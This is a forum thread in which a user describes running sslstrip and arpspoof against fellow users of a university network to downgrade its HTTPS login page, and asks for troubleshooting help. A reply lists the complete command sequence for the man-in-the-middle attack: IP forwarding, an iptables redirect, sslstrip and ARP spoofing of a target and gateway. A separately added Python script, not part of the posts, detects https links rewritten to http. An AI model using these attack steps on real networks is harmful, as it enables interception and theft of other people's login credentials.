Sslstrip Problem


darkn3ssking

hey guyz

I'm facing a real problem with sslstrip. I ran sslstrip and arpspoof at my university on my laptop's BackTrack machine. We have one SSL login like this: https://golestan/. When I ran sslstrip, the URL was changed to http://golestan:445 on the victim machine and it didn't open the URL anymore. If anyone has experience with this, please help me.

I think the URL could be changed to http://golestan/, not http://golestan:445.

Thanks for a quick response.


You should forward all port 80 to SSL strip.

http://www.thoughtcrime.org/software/sslstrip/

Running sslstrip

* Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)

* Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)

* Run sslstrip. (sslstrip.py -l <listenPort>)

* Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

That should do it.


You should forward all port 80 to SSL strip.

http://www.thoughtcrime.org/software/sslstrip/

Call me crazy (I do see the iptables chain listed in your quoted text from the site you linked and understand it), but wouldn't traffic destined for port 80 usually be in clear text anyway? Isn't it usually port 443 (Sometimes port 8080 I suppose) that you want to use SSL Strip on or am I missing something here?

Edited by mux

Call me crazy (I do see the iptables chain listed in your quoted text from the site you linked and understand it), but wouldn't traffic destined for port 80 usually be in clear text anyway? Isn't it usually port 443 (Sometimes port 8080 I suppose) that you want to use SSL Strip on or am I missing something here?

You are correct, but doing just port 80 works. I think sslstrip connects via the HTTPS port and just forwards clear text back to the user. It would be a question for the creator, or you could watch his presentation. I mean, I guess for good measure you could add the other ports you feel are necessary.


You are correct, but doing just port 80 works. I think sslstrip connects via the HTTPS port and just forwards clear text back to the user. It would be a question for the creator, or you could watch his presentation. I mean, I guess for good measure you could add the other ports you feel are necessary.

Gotcha. Once I started looking at that firewall rule it made more sense. I guess I am just too used to seeing FORWARD rules used locally to port forward on my router to even notice that the rule you quoted was using a PREROUTING rule when I scanned over it the first time. I guess that is an easy way to make myself look like an ass. :)

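How a defender can spot the link rewriting discussed in this thread, as an added example that is not part of any post and is not sslstrip's own code: it compares a copy of a page fetched over a trusted path with the copy a client received and lists https links that arrived as http. The host name and both HTML snippets are constructed, and matching ignores the port, so a rewrite that also changes the port, as the first post reports, is still listed.

```python
# Added example: constructed inputs, hypothetical host name.
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_ATTRS = {"href", "action", "src"}

class LinkCollector(HTMLParser):
    """Collect absolute http(s) URLs found in href/action/src attributes."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                parts = urlsplit(value)
                if parts.scheme in ("http", "https") and parts.hostname:
                    self.urls.append(parts)

def collect(html):
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.urls

def key(parts):
    # Port is deliberately left out so a rewrite that also changes it still matches.
    return (parts.hostname, parts.path or "/", parts.query)

def find_downgrades(baseline_html, observed_html):
    """Pairs (baseline_url, observed_url): https in baseline, http in observed."""
    seen_http = {key(u): u for u in collect(observed_html) if u.scheme == "http"}
    return [(u.geturl(), seen_http[key(u)].geturl())
            for u in collect(baseline_html)
            if u.scheme == "https" and key(u) in seen_http]

# Constructed sample pages: BASELINE as served over HTTPS, OBSERVED as a client got it.
BASELINE = ('<a href="https://portal.example.test/login">Login</a>'
            '<form action="https://portal.example.test/auth" method="post"></form>'
            '<a href="http://portal.example.test/help">Help</a>')
OBSERVED = ('<a href="http://portal.example.test:445/login">Login</a>'
            '<form action="http://portal.example.test/auth" method="post"></form>'
            '<a href="http://portal.example.test/help">Help</a>')

if __name__ == "__main__":
    for before, after in find_downgrades(BASELINE, OBSERVED):
        print(f"downgraded: {before} -> {after}")
```

Links that were already plain http in the baseline, such as the help link in the sample, are not reported.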
